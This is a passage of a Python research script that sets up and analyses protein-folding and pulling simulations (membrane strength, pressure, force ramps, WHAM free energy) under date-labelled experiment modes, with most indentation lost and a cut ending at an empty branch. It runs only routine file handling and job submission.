do("mkdir t" + temp)
do("mv metadatafile t" + temp)
cd("t" + temp)
do("pulling_analysis.py -m {} --commons 1 --nsample 4000".format(mode))
cd("..")
cd("..")
cd("..")
if args.day == "oct13":
if args.mode == 2:
print("strong membrane fore ramp")
# start_from_list=["native", "extended", "topology"]
start_from_list=["native"]
# start_from_list=["extended", "topology"]
mode_list = [3] # lipid mediated interaction
# pressure_list = [0, 0.1, 1.0]
pressure_list = [1, 2]
force_ramp_rate_list=[1]
temperature_list=[350]
memb_k_list = [1, 2, 4, 8, 16]
rg_list = [0, 0.4]
force_list = [0.0]
repeat = 10
variable_test(temperature_list=temperature_list,
start_from_list=start_from_list,
rg_list=rg_list,
memb_k_list=memb_k_list,
mode_list=mode_list,
pressure_list=pressure_list,
force_ramp_rate_list=force_ramp_rate_list,
force_list=force_list,
repeat=repeat,
commons=0)
if args.mode == 1:
folder_list = ["rg_0.4_lipid_2_extended", "rg_0.4_lipid_2_topology"]
temp_list = ["all", "350", "400", "450", "500"]
for folder in folder_list:
cd(folder)
do("mkdir -p 2d_qw_dis")
cd("2d_qw_dis")
for temp in temp_list:
if temp != "all":
do("make_metadata.py -m 10 -t " + temp)
else:
do("make_metadata.py -m 9")
do("mkdir t" + temp)
do("mv metadatafile t" + temp)
cd("t" + temp)
do("pulling_analysis.py -m 11 --commons 1")
cd("..")
cd("..")
cd("..")
if args.day == "oct12":
if args.mode == 1:
temp_list = ["400", "450", "500", "all"]
for temp in temp_list:
if temp != "all":
do("make_metadata.py -m 10 -t " + temp)
else:
do("make_metadata.py -m 9")
do("mkdir t" + temp)
do("mv metadatafile t" + temp)
cd("t" + temp)
do("pulling_analysis.py -m 9")
cd("..")
if args.mode == 2:
folder_list = ["rg_0.4_lipid_2_extended", "rg_0.4_lipid_2_topology"]
temp_list = ["350", "400", "450", "500", "all"]
for folder in folder_list:
cd(folder)
# do("mkdir -p 1d_dis")
# cd("1d_dis")
# for temp in temp_list:
# if temp != "all":
# do("make_metadata.py -m 10 -t " + temp)
# else:
# do("make_metadata.py -m 9")
# do("mkdir t" + temp)
# do("mv metadatafile t" + temp)
# cd("t" + temp)
# do("pulling_analysis.py -m 9")
# cd("..")
# cd("..")
do("mkdir -p 1d_qw")
cd("1d_qw")
for temp in temp_list:
if temp != "all":
do("make_metadata.py -m 10 -t " + temp)
else:
do("make_metadata.py -m 9")
do("mkdir t" + temp)
do("mv metadatafile t" + temp)
cd("t" + temp)
do("pulling_analysis.py -m 10")
cd("..")
cd("..")
cd("..")
if args.mode == 3:
print("high temp refold")
# start_from_list=["native", "extended", "topology"]
start_from_list=["native"]
# start_from_list=["extended", "topology"]
mode_list = [3] # lipid mediated interaction
# pressure_list = [0, 0.1, 1.0]
pressure_list = [2]
force_ramp_rate_list=[1000]
temperature_list=[100]
memb_k_list = [1, 2, 4, 8, 16, 32]
rg_list = [0.4]
force_list = [0.0]
repeat = 1
variable_test(temperature_list=temperature_list,
start_from_list=start_from_list,
rg_list=rg_list,
memb_k_list=memb_k_list,
mode_list=mode_list,
pressure_list=pressure_list,
force_ramp_rate_list=force_ramp_rate_list,
force_list=force_list,
repeat=repeat,
commons=1)
if args.day == "oct10":
if args.mode == 5:
do("mkdir combined")
cd("combined")
do("make_metadata.py -m 9")
do("pulling_analysis.py -m 9 --commons 1")
if args.mode == 4:
temp_list = [350, 400, 450, 500]
for temp in temp_list:
do("mkdir t" + str(temp))
cd("t" + str(temp))
do("make_metadata.py -m 10 -t {}".format(temp))
do("pulling_analysis.py -m 9 --commons 1")
cd("..")
if args.mode == 3:
do("make_metadata.py -m 10 -t 400")
do("pulling_analysis.py -m 9")
if args.mode == 2:
print("high temp refold")
start_from_list=["native", "extended", "topology"]
# start_from_list=["native"]
# start_from_list=["extended", "topology"]
mode_list = [3] # lipid mediated interaction
# pressure_list = [0, 0.1, 1.0]
pressure_list = [2]
force_ramp_rate_list=[1]
temperature_list=[500, 550, 600]
memb_k_list = [1]
rg_list = [0.4]
force_list = [0.0]
repeat = 50
variable_test(temperature_list=temperature_list,
start_from_list=start_from_list,
rg_list=rg_list,
memb_k_list=memb_k_list,
mode_list=mode_list,
pressure_list=pressure_list,
force_ramp_rate_list=force_ramp_rate_list,
force_list=force_list,
repeat=repeat)
if args.mode == 1:
fold_list = ["rg_0.4_lipid_2_temp_300_extended", "rg_0.4_lipid_2_temp_300_topology",
"rg_0.4_lipid_2_temp_400_extended", "rg_0.4_lipid_2_temp_400_topology"]
for folder in fold_list:
cd(folder)
cd("simulation")
do("pulling_prepare.py -m 8 --submode 1")
cd("..")
do("mkdir freeEnergy_2")
cd("freeEnergy_2")
do("make_metadata.py -m 3 -k 0.02 -t 300 --submode 1")
do("pulling_analysis.py -m 6")
cd("../..")
if args.day == "oct05":
if args.mode == 5:
print("no go, constant force, refold")
# start_from_list=["native", "extended", "topology"]
# start_from_list=["native"]
start_from_list=["extended", "topology"]
mode_list = [3] # lipid mediated interaction
# pressure_list = [0, 0.1, 1.0]
pressure_list = [2]
force_ramp_rate_list=[0.5]
temperature_list=[400]
memb_k_list = [0, 1, 2, 4]
rg_list = [0.4]
force_list = [0.0]
repeat = 10
variable_test(temperature_list=temperature_list,
start_from_list=start_from_list,
rg_list=rg_list,
memb_k_list=memb_k_list,
mode_list=mode_list,
pressure_list=pressure_list,
force_ramp_rate_list=force_ramp_rate_list,
force_list=force_list,
repeat=repeat)
# # start_from_list=["native", "extended", "topology"]
# # start_from_list=["native"]
# start_from_list=["extended", "topology"]
# mode_list = [3] # lipid mediated interaction
# # pressure_list = [0, 0.1, 1.0]
# pressure_list = [0, 2]
# force_ramp_rate_list=[0.5]
# temperature_list=[400]
# memb_k_list = [0, 1, 2, 4]
# rg_list = [0, 0.4]
# force_list = [0.0]
# repeat = 10
# variable_test(temperature_list=temperature_list,
# start_from_list=start_from_list,
# rg_list=rg_list,
# memb_k_list=memb_k_list,
# mode_list=mode_list,
# pressure_list=pressure_list,
# force_ramp_rate_list=force_ramp_rate_list,
# force_list=force_list,
# repeat=repeat)
if args.mode == 4:
print("membrane effect")
# start_from_list=["native", "extended", "topology"]
start_from_list=["native"]
# start_from_list=["extended", "topology"]
mode_list = [3] # lipid mediated interaction
# pressure_list = [0, 0.1, 1.0]
pressure_list = [0, 0.1, 1, 2]
force_ramp_rate_list=[100]
temperature_list=[200, 300, 400, 500]
memb_k_list = [1, 2, 4, 8, 16]
rg_list = [0, 0.08, 0.4]
force_list =["ramp"]
repeat = 2
variable_test(temperature_list=temperature_list,
start_from_list=start_from_list,
rg_list=rg_list,
memb_k_list=memb_k_list,
mode_list=mode_list,
pressure_list=pressure_list,
force_ramp_rate_list=force_ramp_rate_list,
force_list=force_list,
repeat=repeat)
if args.mode == 1:
fold_list = ["rg_0.4_lipid_2_temp_300_extended", "rg_0.4_lipid_2_temp_300_topology",
"rg_0.4_lipid_2_temp_400_extended", "rg_0.4_lipid_2_temp_400_topology"]
for folder in fold_list:
cd(folder)
cd("simulation")
do("pulling_prepare.py -m 8 --submode 1")
cd("..")
do("mkdir freeEnergy_2")
cd("freeEnergy_2")
do("make_metadata.py -m 3 -k 0.02 -t 300 --submode 1")
do("pulling_analysis.py -m 6")
cd("../..")
if args.mode == 2:
print("2d wham")
# cd("simulation")
# do("pulling_prepare.py -m 8")
# cd("..")
fold_list = ["rg_0.4_lipid_2_temp_300_extended", "rg_0.4_lipid_2_temp_300_topology",
"rg_0.4_lipid_2_temp_400_extended", "rg_0.4_lipid_2_temp_400_topology"]
for folder in fold_list:
cd(folder)
name = "wham2d"
do("mkdir {}".format(name))
cd(name)
do("make_metadata.py -m 3 -k 0.02 -t 300 --submode 1")
do("pulling_analysis.py -m 5")
cd("../..")
if args.mode == 3:
print("qw wham")
# cd("simulation")
# do("pulling_prepare.py -m 8")
# cd("..")
fold_list = ["rg_0.4_lipid_2_temp_300_extended", "rg_0.4_lipid_2_temp_300_topology",
"rg_0.4_lipid_2_temp_400_extended", "rg_0.4_lipid_2_temp_400_topology"]
for folder in fold_list:
cd(folder)
name = "qw_2"
do("mkdir {}".format(name))
cd(name)
do("make_metadata.py -m 3 -k 0.02 -t 300 --submode 1")
do("pulling_analysis.py -m 8")
cd("../..")
if args.day == "oct04":
if args.mode == 1:
# cd("simulation")
# do("pulling_prepare.py -m 8")
# cd("..")
do("mv freeEnergy old_freeEnergy")
do("mkdir freeEnergy")
cd("freeEnergy")
do("make_metadata.py -m 3 -k 0.02 -t 300")
do("pulling_analysis.py -m 6")
if args.mode == 2:
# cd("simulation")
# do("pulling_prepare.py -m 8")
# cd("..")
fold_list = ["rg_0.4_lipid_2_temp_300_extended", "rg_0.4_lipid_2_temp_300_topology",
"rg_0.4_lipid_2_temp_400_extended", "rg_0.4_lipid_2_temp_400_topology"]
for folder in fold_list:
cd(folder)
name = "qw"
do("mkdir {}".format(name))
cd(name)
do("make_metadata.py -m 3 -k 0.02 -t 300")
do("pulling_analysis.py -m 8")
cd("../..")
if args.day == "oct03":
if args.mode == 1:
print("p3 force ramp")
# start_from_list=["native", "extended", "topology"]
start_from_list=["native"]
# start_from_list=["extended", "topology"]
mode_list = [3] # lipid mediated interaction
# pressure_list = [0, 0.1, 1.0]
pressure_list = [0]
force_ramp_rate_list=[0.5]
temperature_list=[200, 300, 400]
memb_k_list = [1]
rg_list = [0, 0.08, 0.4]
force_list =["ramp"]
repeat = 5
variable_test(temperature_list=temperature_list,
start_from_list=start_from_list,
rg_list=rg_list,
memb_k_list=memb_k_list,
mode_list=mode_list,
pressure_list=pressure_list,
force_ramp_rate_list=force_ramp_rate_list,
force_list=force_list,
repeat=repeat)
if args.mode == 2:
print("p3 folding temperature")
# start_from_list=["native", "extended", "topology"]
start_from_list=["native"]
# start_from_list=["extended", "topology"]
mode_list = [3] # lipid mediated interaction
# pressure_list = [0, 0.1, 1.0]
pressure_list = [0, 2]
force_ramp_rate_list=[0.5]
temperature_list=["ramp"]
memb_k_list = [1, 2, 4]
rg_list = [0, 0.08, 0.4]
force_list =["ramp"]
repeat = 2
variable_test(temperature_list=temperature_list,
start_from_list=start_from_list,
rg_list=rg_list,
memb_k_list=memb_k_list,
mode_list=mode_list,
pressure_list=pressure_list,
force_ramp_rate_list=force_ramp_rate_list,
force_list=force_list,
repeat=repeat)
if args.day == "sep26":
if args.mode == 1:
print("constant force")
# start_from_list=["native", "extended", "topology"]
start_from_list=["native"]
# start_from_list=["extended", "topology"]
mode_list = [3] # lipid mediated interaction
# pressure_list = [0, 0.1, 1.0]
pressure_list = [0]
force_ramp_rate_list=[0.5]
temperature_list=[200, 300, 400]
memb_k_list = [1]
rg_list = [0, 0.08, 0.4]
force_list =[0.1, 0.2, 0.25, 0.3, 0.4]
repeat = 5
variable_test(temperature_list=temperature_list,
start_from_list=start_from_list,
rg_list=rg_list,
memb_k_list=memb_k_list,
mode_list=mode_list,
pressure_list=pressure_list,
force_ramp_rate_list=force_ramp_rate_list,
force_list=force_list,
repeat=repeat)
if args.day == "sep25":
if args.mode == 5:
print("constant force")
# start_from_list=["native", "extended", "topology"]
start_from_list=["native"]
# start_from_list=["extended", "topology"]
mode_list = [3] # lipid mediated interaction
# pressure_list = [0, 0.1, 1.0]
pressure_list = [2]
force_ramp_rate_list=[0.5]
temperature_list=[300]
memb_k_list = [1]
rg_list = [0.4]
force_list =[0.6, 0.7, 0.75, 0.8, 0.85]
repeat = 20
variable_test(temperature_list=temperature_list,
start_from_list=start_from_list,
rg_list=rg_list,
memb_k_list=memb_k_list,
mode_list=mode_list,
pressure_list=pressure_list,
force_ramp_rate_list=force_ramp_rate_list,
force_list=force_list,
repeat=repeat)
if args.mode == 4:
print("start with basic")
# start_from_list=["native", "extended", "topology"]
# start_from_list=["native"]
start_from_list=["extended", "topology"]
mode_list = [3] # lipid mediated interaction
# pressure_list = [0, 0.1, 1.0]
pressure_list = [2]
force_ramp_rate_list=[0.5]
temperature_list=[300]
memb_k_list = [1]
rg_list = [0.4]
force_list =[0.0, 0.1, 0.2, 0.3]
repeat = 50
variable_test(temperature_list=temperature_list,
start_from_list=start_from_list,
rg_list=rg_list,
memb_k_list=memb_k_list,
mode_list=mode_list,
pressure_list=pressure_list,
force_ramp_rate_list=force_ramp_rate_list,
force_list=force_list,
repeat=repeat)
if args.mode == 3:
print("start with basic")
# start_from_list=["native", "extended", "topology"]
start_from_list=["native"]
mode_list = [3] # lipid mediated interaction
# pressure_list = [0, 0.1, 1.0]
pressure_list = [0]
force_ramp_rate_list=[1]
temperature_list=[200, 300]
memb_k_list = [1]
rg_list = [0.08]
repeat = 5
variable_test(temperature_list=temperature_list,
start_from_list=start_from_list,
rg_list=rg_list,
memb_k_list=memb_k_list,
mode_list=mode_list,
pressure_list=pressure_list,
force_ramp_rate_list=force_ramp_rate_list,
repeat=repeat)
if args.mode == 2:
print("Force ramp with high rg")
# start_from_list=["native", "extended", "topology"]
start_from_list=["native"]
mode_list = [3] # lipid mediated interaction
# pressure_list = [0, 0.1, 1.0]
pressure_list = [0, 1, 2, 3]
force_ramp_rate_list=[1]
temperature_list=[300]
memb_k_list = [1, 2]
rg_list = [0, 0.2, 0.4, 0.8, 1.6]
repeat = 3
variable_test(temperature_list=temperature_list,
start_from_list=start_from_list,
rg_list=rg_list,
memb_k_list=memb_k_list,
mode_list=mode_list,
pressure_list=pressure_list,
force_ramp_rate_list=force_ramp_rate_list,
repeat=repeat)
if args.mode == 1:
print("Force ramp without go")
# start_from_list=["native", "extended", "topology"]
start_from_list=["native"]
mode_list = [3] # lipid mediated interaction
# pressure_list = [0, 0.1, 1.0]
pressure_list = [0, 1, 2, 3]
force_ramp_rate_list=[1]
temperature_list=[300]
memb_k_list = [0, 1, 2, 4]
rg_list = [0, 0.08, 0.2, 0.4, 1, 2]
repeat = 3
variable_test(temperature_list=temperature_list,
start_from_list=start_from_list,
rg_list=rg_list,
memb_k_list=memb_k_list,
mode_list=mode_list,
pressure_list=pressure_list,
force_ramp_rate_list=force_ramp_rate_list,
repeat=repeat)
if args.day == "sep24":
if args.mode == 1:
# start_from_list=["native", "extended", "topology"]
start_from_list=["native"]
mode_list = [3]
# pressure_list = [0, 0.1, 1.0]
pressure_list = [0, 1, 2, 3]
force_ramp_rate_list=[1]
temperature_list=[200, 300]
memb_k_list = [1, 2, 4]
rg_list = [0, 0.02, 0.08, 0.2]
repeat = 3
variable_test(temperature_list=temperature_list,
start_from_list=start_from_list,
rg_list=rg_list,
memb_k_list=memb_k_list,
mode_list=mode_list,
pressure_list=pressure_list,
force_ramp_rate_list=force_ramp_rate_list,
repeat=repeat)
if args.day == "sep23":
if args.mode == 1:
# start_from_list=["native", "extended", "topology"]
start_from_list=["native"]
mode_list = [3]
# pressure_list = [0, 0.1, 1.0]
pressure_list = [0, 2, 4, 6, 8]
force_ramp_rate_list=[1]
temperature_list=[200, 300, 400]
memb_k_list = [1, 2, 4, 8, 16]
repeat = 5
variable_test(temperature_list=temperature_list,
start_from_list=start_from_list,
memb_k_list=memb_k_list,
mode_list=mode_list,
pressure_list=pressure_list,
force_ramp_rate_list=force_ramp_rate_list,
repeat=repeat)
if args.day == "sep20":
if args.mode == 3:
# start_from_list=["native", "extended", "topology"]
start_from_list=["native"]
mode_list = [3]
# pressure_list = [0, 0.1, 1.0]
pressure_list = [0, 0.1, 1, 2, 4]
force_ramp_rate_list=[1]
temperature_list=[300]
memb_k_list = [1, 2, 4, 8, 16]
repeat = 5
variable_test(temperature_list=temperature_list,
start_from_list=start_from_list,
memb_k_list=memb_k_list,
mode_list=mode_list,
pressure_list=pressure_list,
force_ramp_rate_list=force_ramp_rate_list,
repeat=repeat)
if args.mode == 1:
# start_from_list=["native", "extended", "topology"]
start_from_list=["native"]
mode_list = [3]
# pressure_list = [0, 0.1, 1.0]
pressure_list = [0]
force_ramp_rate_list=[10]
temperature_list=["ramp"]
memb_k_list = [1, 2, 4, 8, 16]
repeat = 2
variable_test(temperature_list=temperature_list,
start_from_list=start_from_list,
memb_k_list=memb_k_list,
mode_list=mode_list,
pressure_list=pressure_list,
force_ramp_rate_list=force_ramp_rate_list,
repeat=repeat)
if args.mode == 2:
# start_from_list=["native", "extended", "topology"]
start_from_list=["native"]
mode_list = [3]
# pressure_list = [0, 0.1, 1.0]
pressure_list = [0]
force_ramp_rate_list=[10]
temperature_list=["ramp"]
repeat = 5
variable_test(temperature_list=temperature_list,
start_from_list=start_from_list,
mode_list=mode_list,
pressure_list=pressure_list,
force_ramp_rate_list=force_ramp_rate_list,
repeat=repeat)
if args.day == "sep17":
if args.mode == 1:
# start_from_list=["native", "extended", "topology"]
start_from_list=["native"]
mode_list = [3]
# pressure_list = [0, 0.1, 1.0]
pressure_list = [0, 0.1, 1, 2, 4]
force_ramp_rate_list=[1, 10]
temperature_list=[230, 300]
repeat = 5
variable_test(temperature_list=temperature_list,
start_from_list=start_from_list,
mode_list=mode_list,
pressure_list=pressure_list,
force_ramp_rate_list=force_ramp_rate_list,
repeat=repeat)
if args.day == "sep11":
if args.mode == 1:
        # folding temperature
pressure_list = [0.1]
rg_list = [0.08]
force_list =["ramp"]
temperature_list=[230, 300]
memb_k_list=[1]
# start_from_list=["extended", "topology"]
start_from_list=["native"]
simulation_model_list=["go"]
force_ramp_rate_list=[1]
variable_test(temperature_list=temperature_list,
memb_k_list=memb_k_list,
rg_list=rg_list,
simulation_model_list=simulation_model_list,
start_from_list=start_from_list,
force_list=force_list,
pressure_list=pressure_list,
repeat=100,force_ramp_rate_list=force_ramp_rate_list)
if args.day == "sep10":
if args.mode == 1:
        # folding temperature
pressure_list = [0.4, 0.8]
rg_list = [0.4]
force_list =[0.3, 0.35, 0.4]
temperature_list=[230, 300]
memb_k_list=[1, 4]
# start_from_list=["extended", "topology"]
start_from_list=["native"]
simulation_model_list=["go"]
force_ramp_rate_list=[2]
variable_test(temperature_list=temperature_list,
memb_k_list=memb_k_list,
rg_list=rg_list,
simulation_model_list=simulation_model_list,
start_from_list=start_from_list,
force_list=force_list,
pressure_list=pressure_list,
repeat=10,force_ramp_rate_list=force_ramp_rate_list)
if args.mode == 2:
        # folding temperature
pressure_list = [0.1]
rg_list = [0.08, 0.2]
memb_k_list=[1, 2, 4]
force_list =[0.01, 0.02, 0.04, 0.08]
temperature_list=[230, 300]
start_from_list=["extended", "topology"]
# start_from_list=["native"]
simulation_model_list=["go"]
force_ramp_rate_list=[2]
variable_test(temperature_list=temperature_list,
memb_k_list=memb_k_list,
rg_list=rg_list,
simulation_model_list=simulation_model_list,
start_from_list=start_from_list,
force_list=force_list,
pressure_list=pressure_list,
repeat=4, force_ramp_rate_list=force_ramp_rate_list)
if args.mode == 3:
        # folding temperature
pressure_list = [0.1]
rg_list = [0.08]
memb_k_list=[1]
force_list =[0.2, 0.3, 0.35, 0.4]
temperature_list=[230]
# start_from_list=["extended", "topology"]
start_from_list=["native"]
simulation_model_list=["go"]
force_ramp_rate_list=[2]
variable_test(temperature_list=temperature_list,
memb_k_list=memb_k_list,
rg_list=rg_list,
simulation_model_list=simulation_model_list,
start_from_list=start_from_list,
force_list=force_list,
pressure_list=pressure_list,
repeat=20, force_ramp_rate_list=force_ramp_rate_list)
if args.mode == 4: # pending
        # folding temperature
pressure_list = [0.1]
rg_list = [0.08]
memb_k_list=[1, 2, 4]
force_list =[0.2, 0.3, 0.35, 0.4]
temperature_list=[230, 300]
# start_from_list=["extended", "topology"]
start_from_list=["native"]
simulation_model_list=["go"]
force_ramp_rate_list=[2]
variable_test(temperature_list=temperature_list,
memb_k_list=memb_k_list,
rg_list=rg_list,
simulation_model_list=simulation_model_list,
start_from_list=start_from_list,
force_list=force_list,
pressure_list=pressure_list,
repeat=10, force_ramp_rate_list=force_ramp_rate_list)
if args.day == "sep09":
if args.mode == 1:
cd("simulation")
do("pulling_prepare.py -m 7")
cd("..")
do("mkdir freeEnergy")
cd("freeEnergy")
do("make_metadata.py -m 3 -k 0.02 -t 230")
do("pulling_analysis.py -m 6")
if args.mode == 2:
cmd = "gg.py -m 8"
run_slurm = base_slurm.format(cmd)
# folder_list = glob.glob("force_*")
# folder_list = ['force_0.08', 'force_0.03', 'force_0.0']
folder_list = ['force_0.055']
# folder_list = ['force_0.07', 'force_0.02', 'force_0.045']
# folder_list = ['force_0.06', 'force_0.04']
print(folder_list)
for folder in folder_list:
cd(folder)
cd("simulation")
run_list = glob.glob("*")
for run in run_list:
cd(run)
cd("0")
with open("compute_angle.slurm", "w") as r:
r.write(run_slurm)
do("sbatch compute_angle.slurm")
cd("../..")
cd("../..")
if args.mode == 3:
        # folding temperature
pressure_list = [0.0, 0.1, 0.2]
force_list =[0.0]
rg_list = [0, 0.08, 0.1, 0.2]
temperature_list=["ramp"]
# start_from_list=["extended", "topology"]
start_from_list=["native"]
simulation_model_list=["go", "single"]
variable_test(temperature_list=temperature_list,
simulation_model_list=simulation_model_list,
rg_list=rg_list,
start_from_list=start_from_list,
force_list=force_list,
pressure_list=pressure_list,
repeat=3,force_ramp_rate_list=[10, 1])
if args.mode == 4:
        # folding temperature
pressure_list = [0, 0.1, 0.2]
rg_list = [0, 0.08, 0.1, 0.2]
force_list =[0.0]
temperature_list=[230]
# start_from_list=["extended", "topology"]
start_from_list=["native"]
simulation_model_list=["go", "single"]
force_ramp_rate_list=[1, 10]
variable_test(temperature_list=temperature_list,
rg_list=rg_list,
simulation_model_list=simulation_model_list,
start_from_list=start_from_list,
force_list=force_list,
pressure_list=pressure_list,
repeat=5,force_ramp_rate_list=force_ramp_rate_list)
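    # mode 5: extract the second column of wham.dat / addforce.dat as qw.dat and
    # distance.dat for runs 0-99, then build directory_list (runs 0-39) for
    # CalcLocalDistanceStats.py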
if(args.mode == 5):
print("Extract qw and distance info.")
for i in range(100):
cd(str(i))
cd("0")
do("awk '{print $2}' wham.dat | sed 's/,$//' | sed 1d > qw.dat")
do("awk '{print $2}' addforce.dat | sed 's/,$//' | sed 1d > distance.dat")
cd("../..")
print("create directory_list")
with open("directory_list", "w") as f:
for i in range(40):
# print(os.getcwd())
location = os.getcwd() + "/../"
f.write(location+str(i)+"/0\n")
do("cp ../../2xov/2xov.pdb .")
do("python2 ~/opt/small_script/CalcLocalDistanceStats.py 2xov directory_list out")
if args.mode == 6:
        # folding temperature
pressure_list = [0.1]
rg_list = [0.1]
memb_k_list=[1, 4]
force_list =[0.1, 0.15, 0.05]
temperature_list=[230, 300]
start_from_list=["extended", "topology"]
# start_from_list=["native"]
simulation_model_list=["go", "single"]
force_ramp_rate_list=[10]
variable_test(temperature_list=temperature_list,
memb_k_list=memb_k_list,
rg_list=rg_list,
simulation_model_list=simulation_model_list,
start_from_list=start_from_list,
force_list=force_list,
pressure_list=pressure_list,
repeat=7,force_ramp_rate_list=force_ramp_rate_list)
if args.mode == 7:
        # folding temperature
pressure_list = [0.4]
rg_list = [0.4]
memb_k_list=[4]
force_list =[0.0]
temperature_list=[230]
# start_from_list=["extended", "topology"]
start_from_list=["native"]
simulation_model_list=["go", "single"]
force_ramp_rate_list=[1]
variable_test(temperature_list=temperature_list,
memb_k_list=memb_k_list,
rg_list=rg_list,
simulation_model_list=simulation_model_list,
start_from_list=start_from_list,
force_list=force_list,
pressure_list=pressure_list,
repeat=20,force_ramp_rate_list=force_ramp_rate_list)
if args.mode == 8:
        # folding temperature
pressure_list = [0.4]
rg_list = [0.4]
memb_k_list=[4]
force_list =[0.1, 0.15, 0.05]
temperature_list=[230, 300]
start_from_list=["extended", "topology"]
# start_from_list=["native"]
simulation_model_list=["go", "single"]
force_ramp_rate_list=[2]
variable_test(temperature_list=temperature_list,
memb_k_list=memb_k_list,
rg_list=rg_list,
simulation_model_list=simulation_model_list,
start_from_list=start_from_list,
force_list=force_list,
pressure_list=pressure_list,
repeat=6,force_ramp_rate_list=force_ramp_rate_list)
if args.day == "sep08":
if args.mode == 1:
pressure_list = [0.1, 0.2, 0.4]
force_list =[0.01, 0.02, 0.04, 0.08]
temperature_list=[230]
start_from_list=["extended", "topology"]
variable_test(temperature_list=temperature_list,
start_from_list=start_from_list,
force_list=force_list,
pressure_list=pressure_list,
repeat=20,force_ramp_rate_list=[1])
if args.mode == 2:
pressure_list = [0.1]
force_list =[0.01, 0.02]
temperature_list=[230, 240]
# start_from_list=["extended", "topology"]
start_from_list=["extended"]
variable_test(temperature_list=temperature_list,
start_from_list=start_from_list,
force_list=force_list,
pressure_list=pressure_list,
repeat=50,force_ramp_rate_list=[0.5])
if args.mode == 3:
        # folding temperature
pressure_list = [0.1, 0.2]
force_list =[0.0]
temperature_list=["ramp"]
# start_from_list=["extended", "topology"]
start_from_list=["native"]
simulation_model_list=["go", "single"]
variable_test(temperature_list=temperature_list,
simulation_model_list=simulation_model_list,
start_from_list=start_from_list,
force_list=force_list,
pressure_list=pressure_list,
repeat=5,force_ramp_rate_list=[10])
if args.mode == 4:
        # folding temperature
pressure_list = [0.1, 0.2]
force_list =[0.0]
temperature_list=[200]
# start_from_list=["extended", "topology"]
start_from_list=["native"]
simulation_model_list=["go", "single"]
force_ramp_rate_list=[1, 10]
variable_test(temperature_list=temperature_list,
simulation_model_list=simulation_model_list,
start_from_list=start_from_list,
force_list=force_list,
pressure_list=pressure_list,
repeat=20,force_ramp_rate_list=force_ramp_rate_list)
if args.day == "sep07":
if args.mode == 9:
# simulation_model_list=["go", "single"]
force_list =[0.55, 0.5, 0.56, 0.57, 0.58, 0.59]
variable_test(force_list=force_list, repeat=20)
if args.mode == 8:
# simulation_model_list=["go", "single"]
# force_list =[0.6, 0.5, 0.4]
# memb_k_list = [1, 2, 4]
pressure_list = [0.1, 0.2, 0.4]
# pressure_list = [0.8, 1.6]
rg_list = [0.08, 0.04, 0.02]
k_list = [0.1, 0.2, 0.3, 0.4]
variable_test(k_list=k_list, pressure_list=pressure_list,
force_ramp_rate_list=[10], rg_list=rg_list, repeat=3)
if args.mode == 7:
cd("simulation")
do("pulling_prepare.py -m 7")
cd("..")
do("mkdir freeEnergy")
cd("freeEnergy")
do("make_metadata.py -m 3 -k 0.02 -t 230")
do("pulling_analysis.py -m 6")
if args.mode == 1:
memb_k_list = [1, 2, 4, 8, 16]
variable_test(memb_k_list=memb_k_list, repeat=5)
if args.mode == 2:
force_ramp_rate_list = [1, 2, 4, 8, 16, 32]
variable_test(force_ramp_rate_list=force_ramp_rate_list, repeat=5)
if args.mode == 3:
force_ramp_rate_list = [1, 2, 4, 8, 16, 32]
variable_test(temperature_list=[200], force_ramp_rate_list=force_ramp_rate_list, repeat=5)
if args.mode == 4:
# simulation_model_list=["go", "single"]
# force_list =[0.6, 0.5, 0.4]
force_list =[0.8, 0.6, 0.4]
memb_k_list = [1, 2, 4]
variable_test(memb_k_list=memb_k_list, force_list=force_list, repeat=5)
if args.mode == 6:
# simulation_model_list=["go", "single"]
# force_list =[0.6, 0.5, 0.4]
force_list =[0.3]
memb_k_list = [1, 2, 4]
# pressure_list = [0.1, 0.2, 0.4]
pressure_list = [0.8, 1.6]
k_list = [10, 11, 12, 13]
variable_test(k_list=k_list, pressure_list=pressure_list,
force_ramp_rate_list=[10], memb_k_list=memb_k_list, force_list=force_list, repeat=3)
if args.day == "sep06":
if args.mode == 1:
start_from_list=["extended", "topology"]
simulation_model_list=["go", "single"]
temperature_list = [200, 250, 300]
pressure_list = [0, 0.1, 0.5, 1]
variable_test(pressure_list=pressure_list,
start_from_list=start_from_list,
simulation_model_list=simulation_model_list,
repeat=5,
temperature_list=temperature_list,
commons=0)
if args.mode == 2:
start_from_list=["extended", "topology"]
simulation_model_list=["go", "single"]
temperature_list = [250, 300]
memb_k_list = [0, 1, 2, 4]
rg_list = [0, 0.1]
variable_test(rg_list=rg_list, memb_k_list=memb_k_list,
start_from_list=start_from_list,
simulation_model_list=simulation_model_list,
repeat=3,
temperature_list=temperature_list,
commons=0)
if args.mode == 20:
rg_list = [0]
temperature_list = [200]
variable_test(rg_list=rg_list, repeat=40, temperature_list=temperature_list, commons=True)
if args.mode == 19:
rg_list = [0]
temperature_list = [175, 200, 225, 250]
variable_test(rg_list=rg_list, repeat=20, temperature_list=temperature_list, commons=True)
if args.mode == 18:
rg_list = [0, 0.1, 0.2, 1]
memb_k_list = [0, 1, 2, 4]
pressure_list = [0, 0.1, 0.2, 0.4, 0.8, 1, 2]
# rg_list = [0.1]
# memb_k_list = [1]
# pressure_list = [0.1, 1]
variable_test(rg_list=rg_list, memb_k_list=memb_k_list, pressure_list=pressure_list, repeat=2)
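    # mode 17: for each protocol, copy the matching gremlin/raptor go_rnativeC*
    # contact files into the protein folder, point the *_multi.in input at the
    # corresponding fix_backbone_coeff file, and launch 20 runs with run.py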
if args.mode == 17:
# protocol_list = ["er", "awsemer", "frag", "raptor"]
protocol_list = ["awsemer", "frag"]
protein_list = ["1occ"]
for protein in protein_list:
for protocol in protocol_list:
print("Work on protein: {}, protocol: {}".format(protein, protocol))
if protocol == "raptor":
do("cp ~/opt/gremlin/protein/1occ/raptor/go_rnativeC* {}/".format(protein))
else:
do("cp ~/opt/gremlin/protein/1occ/gremlin/go_rnativeC* {}/".format(protein))
do("mkdir -p {}".format(protocol))
do("cp -r {} {}/".format(protein, protocol))
cd(protocol)
cd(protein)
fileName = "{}_multi.in".format(protein)
if protocol == "raptor":
backbone_file = "fix_backbone_coeff_er.data"
do("cp ~/opt/gremlin/protein/{}/raptor/go_rnativeC* .".format(protein))
else:
backbone_file = "fix_backbone_coeff_{}.data".format(protocol)
do("cp ~/opt/gremlin/protein/{}/gremlin/go_rnativeC* .".format(protein))
with fileinput.FileInput(fileName, inplace=True, backup='.bak') as file:
for line in file:
tmp = line
tmp = tmp.replace("fix_backbone_coeff_er.data", backbone_file)
print(tmp, end='')
cd("..")
do("run.py -m 0 -n 20 {}".format(protein))
cd("..")
if args.mode == 16:
